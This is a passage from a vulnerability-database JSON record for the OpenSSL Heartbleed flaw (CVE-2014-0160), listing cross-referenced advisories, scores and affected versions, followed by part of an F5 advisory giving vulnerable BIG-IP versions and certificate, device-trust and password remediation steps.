["THN:8D999AEE5218AD3BFA68E5ACE101F201", "THN:EBCB003D7DB7BD8BF73239F9718C6126", "THN:4868B616BCBA555DA2446F6F0EA837B0"], "type": "thn"}, {"idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"], "type": "cloudfoundry"}, {"idList": ["CESA-2014:0376"], "type": "centos"}, {"idList": ["OPENSUSE-2014-318.NASL", "OPENVPN_HEARTBLEED.NASL", "HP_VCA_SSRT101531.NASL", "ALA_ALAS-2014-320.NASL", "KASPERSKY_INTERNET_SECURITY_HEARTBLEED.NASL", "JUNIPER_JSA10623.NASL", "REDHAT-RHSA-2014-0377.NASL", "MCAFEE_NGFW_SB10071.NASL", "MCAFEE_VSEL_SB10071.NASL", "ORACLELINUX_ELSA-2014-0376.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20140417-HEARTBLEED"], "type": "huawei"}, {"idList": ["ICSA-14-126-01A", "ICSA-14-135-02", "ICSA-14-114-01", "ICSA-14-135-04"], "type": "ics"}, {"idList": ["ATLASSIAN:JRACLOUD-38927"], "type": "atlassian"}, {"idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733"], "type": "kitploit"}, {"idList": ["SECURITYVULNS:DOC:30523", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30507", "SECURITYVULNS:DOC:30500", "SECURITYVULNS:DOC:30497", "SECURITYVULNS:DOC:30511", "SECURITYVULNS:DOC:30502", "SECURITYVULNS:DOC:30509", "SECURITYVULNS:DOC:30498", "SECURITYVULNS:DOC:30553"], "type": "securityvulns"}, {"idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978"], "type": "freebsd"}, {"idList": ["VULNERLAB:1254"], "type": "vulnerlab"}, {"idList": ["CISCO-SA-20140408-CVE-2014-0160"], "type": "cisco"}, {"idList": ["OPENVAS:871154", "OPENVAS:881918", "OPENVAS:1361412562310105722", "OPENVAS:1361412562310105010", "OPENVAS:1361412562310850582", "OPENVAS:1361412562310881918"], "type": "openvas"}, {"idList": ["RHSA-2014:0378"], "type": "redhat"}, {"idList": ["1337DAY-ID-22122", "1337DAY-ID-22114"], "type": "zdt"}, {"idList": ["N0WHERE:76566"], "type": "n0where"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}]}, "score": {"modified": "2019-09-28T12:09:00", "value": 3.1, "vector": "NONE"}}, "hash": "f0e50eb0fddfe2b0a01f33b520036b285999d9f2fce06021f99e540e1cd70d14", "hashmap": [{"hash": "4a7f9b96159b185177ba0e028013ad0d", "key": "description"}, {"hash": "4e6de9f15972c64d07114049f2990cee", "key": "published"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "9ef1a304ad3a7d2a64542a650c6ed7f9", "key": "cpe23"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "e47701c26849d76ae028a2f8417316ff", "key": "references"}, {"hash": "3a54f0dadd63e258c9fe568e073277f0", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "558f8e06acb9904c2df3eef5d5dc7dd3", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f85b26d5e70f0213ff61e66d4a867d1a", "key": "href"}, {"hash": "061f4a9aa366d9efc70d4fe225664979", "key": "cpe"}, {"hash": "be362338053a91d71f19a12380585eaf", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "9284251a43e341803d4971bd8752145e", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "id": "CVE-2014-0160", "lastseen": "2019-09-28T12:09:00", "modified": "2019-09-27T18:22:00", "objectVersion": "1.3", "published": "2014-04-07T22:55:00", "references": ["http://marc.info/?l=bugtraq&m=139757726426985&w=2", "http://www.exploit-db.com/exploits/32745", "http://www.securitytracker.com/id/1030079", "http://marc.info/?l=bugtraq&m=139758572430452&w=2", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html", "http://marc.info/?l=bugtraq&m=140015787404650&w=2", "http://marc.info/?l=bugtraq&m=139824993005633&w=2", "http://www.kerio.com/support/kerio-control/release-history", "http://www.securitytracker.com/id/1030082", "http://marc.info/?l=bugtraq&m=139817685517037&w=2", "http://www.kb.cert.org/vuls/id/720951", "http://marc.info/?l=bugtraq&m=139765756720506&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001843", "http://cogentdatahub.com/ReleaseNotes.html", "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E", "http://seclists.org/fulldisclosure/2014/Apr/190", "http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/", "http://marc.info/?l=bugtraq&m=139835815211508&w=2", "http://seclists.org/fulldisclosure/2014/Apr/109", "http://www.exploit-db.com/exploits/32764", "http://marc.info/?l=bugtraq&m=139905243827825&w=2", "http://www.ubuntu.com/usn/USN-2165-1", "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", "http://support.citrix.com/article/CTX140605", "http://www.securityfocus.com/archive/1/534161/100/0/threaded", "http://marc.info/?l=bugtraq&m=139817727317190&w=2", "http://marc.info/?l=bugtraq&m=139889113431619&w=2", "http://seclists.org/fulldisclosure/2014/Dec/23", "http://secunia.com/advisories/57966", "http://marc.info/?l=bugtraq&m=139905405728262&w=2", "https://filezilla-project.org/versions.php?type=server", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "http://marc.info/?l=bugtraq&m=139774703817488&w=2", "http://marc.info/?l=bugtraq&m=139889295732144&w=2", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "http://rhn.redhat.com/errata/RHSA-2014-0378.html", "http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/", "http://marc.info/?l=bugtraq&m=139842151128341&w=2", "http://marc.info/?l=bugtraq&m=139774054614965&w=2", "http://marc.info/?l=bugtraq&m=139905295427946&w=2", "https://gist.github.com/chapmajs/10473815", "http://secunia.com/advisories/57836", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html", "http://marc.info/?l=bugtraq&m=142660345230545&w=2", "http://www.blackberry.com/btsc/KB35882", "http://marc.info/?l=bugtraq&m=139833395230364&w=2", "http://seclists.org/fulldisclosure/2014/Apr/173", "http://marc.info/?l=bugtraq&m=139836085512508&w=2", "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0", "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html", "http://secunia.com/advisories/59347", "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160", "https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken", "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008", "http://marc.info/?l=bugtraq&m=139905458328378&w=2", "http://marc.info/?l=bugtraq&m=139905202427693&w=2", "http://marc.info/?l=bugtraq&m=140752315422991&w=2", "https://code.google.com/p/mod-spdy/issues/detail?id=85", "http://www.vmware.com/security/advisories/VMSA-2014-0012.html", "http://marc.info/?l=bugtraq&m=139869891830365&w=2", "http://www.debian.org/security/2014/dsa-2896", "http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661", "http://www.securitytracker.com/id/1030026", "http://rhn.redhat.com/errata/RHSA-2014-0396.html", "http://secunia.com/advisories/57483", "http://www.securityfocus.com/bid/66690", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217", "http://marc.info/?l=bugtraq&m=139824923705461&w=2", "http://secunia.com/advisories/57968", "http://www.securitytracker.com/id/1030078", "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", "http://secunia.com/advisories/57347", "http://heartbleed.com/", "http://marc.info/?l=bugtraq&m=139722163017074&w=2", "http://marc.info/?l=bugtraq&m=140724451518351&w=2", "http://secunia.com/advisories/57721", "https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d@%3Cdev.tomcat.apache.org%3E", "http://www-01.ibm.com/support/docview.wss?uid=swg21670161", "http://marc.info/?l=bugtraq&m=141287864628122&w=2", "http://www.openssl.org/news/secadv_20140407.txt", "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html", "http://www.securitytracker.com/id/1030081", "http://marc.info/?l=bugtraq&m=139817782017443&w=2", "http://seclists.org/fulldisclosure/2014/Apr/91", "http://marc.info/?l=bugtraq&m=139843768401936&w=2", "http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html", "http://www.securitytracker.com/id/1030077", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html", "http://seclists.org/fulldisclosure/2014/Apr/90", "http://secunia.com/advisories/59139", "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01", "http://www.us-cert.gov/ncas/alerts/TA14-098A", "http://advisories.mageia.org/MGASA-2014-0165.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1084875", "http://www.f-secure.com/en/web/labs_global/fsc-2014-1", "http://www.securitytracker.com/id/1030074", "http://secunia.com/advisories/59243", "http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=96db9023b881d7cd9f379b0c154650d6c108e9a3", "http://www.securitytracker.com/id/1030080", "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/", "http://rhn.redhat.com/errata/RHSA-2014-0376.html", "http://marc.info/?l=bugtraq&m=139905351928096&w=2", "http://rhn.redhat.com/errata/RHSA-2014-0377.html", "http://marc.info/?l=bugtraq&m=139757819327350&w=2", "http://marc.info/?l=bugtraq&m=139835844111589&w=2", "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00", "http://marc.info/?l=bugtraq&m=139757919027752&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001841", "http://marc.info/?l=bugtraq&m=139869720529462&w=2", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/", "http://marc.info/?l=bugtraq&m=140075368411126&w=2", "http://marc.info/?l=bugtraq&m=139905868529690&w=2", "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf", "http://marc.info/?l=bugtraq&m=139905653828999&w=2", "http://www.splunk.com/view/SP-CAAAMB3", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3", "https://www.cert.fi/en/reports/2014/vulnerability788210.html", "http://marc.info/?l=bugtraq&m=139808058921905&w=2"], "reporter": "cve@mitre.org", "title": "CVE-2014-0160", "type": "cve", "viewCount": 397}, "differentElements": ["modified"], "edition": 2, "lastseen": "2019-09-28T12:09:00"}], "edition": 3, "hashmap": [{"key": "affectedSoftware", "hash": "be362338053a91d71f19a12380585eaf"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "061f4a9aa366d9efc70d4fe225664979"}, {"key": "cpe23", "hash": "9ef1a304ad3a7d2a64542a650c6ed7f9"}, {"key": "cvelist", "hash": "558f8e06acb9904c2df3eef5d5dc7dd3"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "bb61a0949f8c36262500079f243672e2"}, {"key": "description", "hash": "4a7f9b96159b185177ba0e028013ad0d"}, {"key": "href", "hash": "f85b26d5e70f0213ff61e66d4a867d1a"}, {"key": "modified", "hash": "7a809d0988af0bdc78051bf1665e30df"}, {"key": "published", "hash": "4e6de9f15972c64d07114049f2990cee"}, {"key": "references", "hash": "e47701c26849d76ae028a2f8417316ff"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "9284251a43e341803d4971bd8752145e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ba15331a48484ee3db4d246036165fbc0aaecc5922508cced4a1af123911c4d6", "viewCount": 800, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K15159", "SOL15159"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2014-0160"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"]}, {"type": "kitploit", "idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30504", "SECURITYVULNS:DOC:30473", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30525", "SECURITYVULNS:DOC:30519", "SECURITYVULNS:DOC:30478", "SECURITYVULNS:DOC:30474", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30471"]}, {"type": "hackerone", "idList": ["H1:32570", "H1:6475", "H1:6626", "H1:44294", "H1:49139"]}, {"type": "seebug", "idList": ["SSV:62086", "SSV:62240", "SSV:62181", "SSV:95013", "SSV:86061", "SSV:62239", "SSV:62190", "SSV:62241", "SSV:62186"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRACLOUD-38927"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0492-1"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2014-0376.NASL", "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "AIX_OPENSSL_ADVISORY7.NASL", "OPENSUSE-2014-277.NASL", "HP_OFFICEJET_PRO_HEARTBLEED.NASL", "MCAFEE_EMAIL_GATEWAY_SB10071.NASL", "FORTINET_FG-IR-14-011.NASL", "SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL", "CENTOS_RHSA-2014-0376.NASL", "STUNNEL_5_01.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103936", "OPENVAS:1361412562310702896", "OPENVAS:871154", "OPENVAS:1361412562310881918", "OPENVAS:1361412562310850582", "OPENVAS:1361412562310105722"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2896-2:FEB91", "DEBIAN:DSA-2896-1:7AEC1"]}, {"type": "thn", "idList": ["THN:0F7112302CBABF46D19CACCCFA6103C5", "THN:244769C413FFA5BE647D8F6F93431B74"]}, {"type": "myhack58", "idList": ["MYHACK58:62201444409"]}, {"type": "ics", "idList": ["ICSA-14-135-05", "ICSA-14-135-04", "ICSA-14-126-01A"]}, {"type": "redhat", "idList": ["RHSA-2014:0376"]}, {"type": "nmap", "idList": ["NMAP:SSL-HEARTBLEED.NSE"]}, {"type": "cert", "idList": ["VU:720951"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0376"]}, {"type": "threatpost", "idList": ["THREATPOST:9012A325F248438FAC15C4FB3082A796", "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "THREATPOST:15624C23F5CD5AC1029501D08A99D294"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140417-HEARTBLEED"]}, {"type": "zdt", "idList": ["1337DAY-ID-22122"]}, {"type": "n0where", "idList": ["N0WHERE:76566"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126101", "PACKETSTORM:126308"]}, {"type": "freebsd", "idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978"]}], "modified": "2019-10-10T12:13:41"}, "score": {"value": 3.7, "vector": "NONE", "modified": "2019-10-10T12:13:41"}, "vulnersScore": 3.7}, "objectVersion": "1.3", "cpe": ["cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.2", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.1f"], "affectedSoftware": [{"name": "openssl openssl", "operator": "eq", "version": "1.0.1e"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1b"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1c"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1d"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1a"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.2"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1f"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*"], "cwe": ["CWE-119"], "scheme": null}
{"f5": [{"lastseen": "2020-01-24T14:29:12", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 